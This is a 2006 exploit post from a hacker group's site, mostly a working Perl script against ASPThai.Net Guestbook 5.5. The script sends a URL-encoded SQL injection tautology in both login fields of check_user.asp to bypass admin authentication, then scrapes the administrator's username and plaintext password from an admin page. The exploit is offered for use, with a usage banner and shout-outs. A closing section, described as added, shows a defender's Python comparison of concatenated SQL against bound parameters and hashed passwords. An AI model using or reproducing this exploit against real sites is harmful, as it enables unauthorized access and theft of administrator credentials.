SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5
Source: http://www.g00ns.net Author: Zodiac Published: 2006-02-08


I MurderSkillz from g00ns.net found a vuln "SQL Injection Exploit for
ASPThai.Net Guestbook <= 5.5 and POSSIBLY higher" The sql injection takes
place in admin.asp. IF injected with special characters into the login it
will grant u with admin..BUT we wrote some code to grab plaintext user
and pass..here is the code


#!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5
#(And possible higher could not find a site to test it on)
# This exploit shows the username of the administrator and the password In plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net
#irc.g00ns.net #g00ns email = zodiac@g00ns.net
#(c) 2006

use LWP::UserAgent;
use HTTP::Cookies;


$Server = $ARGV[0];

if($Server =~m/http/g)
{
$Server=~ 'http://$Server';
print
}

else {
print $error;
}


if(!$Server) {usage();exit() ;}

head();

print "\r\nGrabbing Username And Password\r\n\n";

#Login's and stores a cookie to view admin panel later


$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->agent('g00ns');
$xpl->cookie_jar($cookie_jar);

$res = $xpl->post(
$Server.'check_user.asp',
Content => [


'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'Submit' => '-= Login =-',
],
);

# Create a request
my $req = HTTP::Request->new(GET =>

$Server.'change_admin_username.asp'

);

$req->header('Referer', $Server.'admin_menu.asp');

my $res = $xpl->request($req);

$info= $res->content;

if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
{
die "Error Connecting...\r\n";
}


#Check the outcome of the response

$info=~m/(value=\")(\n+|\w+|\W+)/g;
$User = $2;
$info=~m/(value=\")(\n+|\w+|\W+)/g;
$Pass= $2;


print "UserName:$User\r\nPassword:$Pass\r\n";

sub head()
{
print "\n=======================================================================\r\n";
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net*\r\n";
print "=======================================================================\r\n";
}
sub usage()
{
head();
print " Usage: Thaisql.pl <Site> \r\n\n";
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/\r\n";
print "=======================================================================\r\n";
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
print "=======================================================================\r\n";
exit();
}

it's been out for like 2 days now..
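
The flaw class the post describes, seen from the defender's side: a login check that concatenates form values into SQL accepts the tautology string sent in txtUserName and txtUserPass, while a bound-parameter lookup with hashed passwords rejects it and leaves no plaintext password to display. This is an added example, not code from the original post or from ASPThai.Net Guestbook; the table layout, the query shape and all function names are assumptions, and Python with SQLite stands in for the ASP application and its database.

```python
import hashlib
import hmac
import os
import sqlite3

# The tautology string the page's script sends in both login fields.
TAUTOLOGY = "' or '%67%30%30%6e%73'='%67%30%30%6e%73"

def make_db():
    # Constructed sample data: one admin row (hypothetical schema).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", b"s3cret-sample", salt, 200_000)
    # The plaintext column exists only for the flawed check; a fixed schema drops it.
    db.execute("INSERT INTO admin VALUES (?, ?, ?, ?)",
               ("admin", "s3cret-sample", salt, pw_hash))
    return db

def login_vulnerable(db, user, pw):
    # Assumed shape of the flawed check: form values become part of the SQL text,
    # so a quote in the input closes the literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM admin WHERE username = '" + user +
           "' AND password = '" + pw + "'")
    return db.execute(sql).fetchone() is not None

def login_hardened(db, user, pw):
    # Bound parameter: the submitted value is compared as data, never parsed as SQL.
    row = db.execute("SELECT salt, pw_hash FROM admin WHERE username = ?",
                     (user,)).fetchone()
    if row is None:
        return False
    # Only a salted hash is stored, so no admin page can echo the password back.
    candidate = hashlib.pbkdf2_hmac("sha256", pw.encode(), row[0], 200_000)
    return hmac.compare_digest(candidate, row[1])

if __name__ == "__main__":
    db = make_db()
    print("flawed check accepts tautology:  ", login_vulnerable(db, TAUTOLOGY, TAUTOLOGY))
    print("hardened check accepts tautology:", login_hardened(db, TAUTOLOGY, TAUTOLOGY))
```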
